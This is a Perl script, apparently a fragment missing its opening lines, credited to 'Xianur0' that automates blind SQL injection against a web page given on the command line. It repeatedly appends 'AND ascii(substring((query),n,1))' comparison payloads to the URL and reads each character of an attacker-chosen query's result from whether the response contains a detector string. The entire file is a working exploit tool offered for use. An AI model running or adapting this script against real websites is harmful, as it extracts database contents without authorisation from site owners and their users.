$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
$url = $ARGV[0] || die("Use: SQL.pl [URI]\nExample: sql.pl http://www.vuln.com/vuln.php?id=1\n");
print "\nBlind SQL Injection converter to SQL Injection By Xianur0\n\n";
print "\nEnter the SQL Injection please:\n";
$sql=<STDIN>;
chop($sql);
print "\nEnter the Detector please:\n";
$detector=<STDIN>;
chop($detector);
print "\nPlease Have Patience, running.........\n";
$caracter = 1;
$i=0;
$simbolo = ">";
while($caracter ne "finito") {
if($debugmode eq "true") { print $url.'/**/AND/**/ascii(substring(('.$sql.'),'.$caracter.',1))/**/'.$simbolo.'/**/'.$i."\n";}
$req = HTTP::Request->new(GET => $url.'/**/AND/**/ascii(substring(('.$sql.'),'.$caracter.',1))/**/'.$simbolo.'/**/'.$i);
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if ($res->is_success) {
if($res->content !~ $detector) {
if($base eq $i) { print chr($i); $caracter++; $i=0; $simbolo = ">";}
$base = $i;
$i = $i+10;
} else { if($i eq 0) { print "\nError Performing Blind (Less Value to 0)!\n"; $caracter = "finito";} else {$i = $i-1; $simbolo = "=";}
}
} else {
print "\nError detected in HTTP requests: " . $res->status_line . "!\n";
}
}
print "\nFinished!\n";
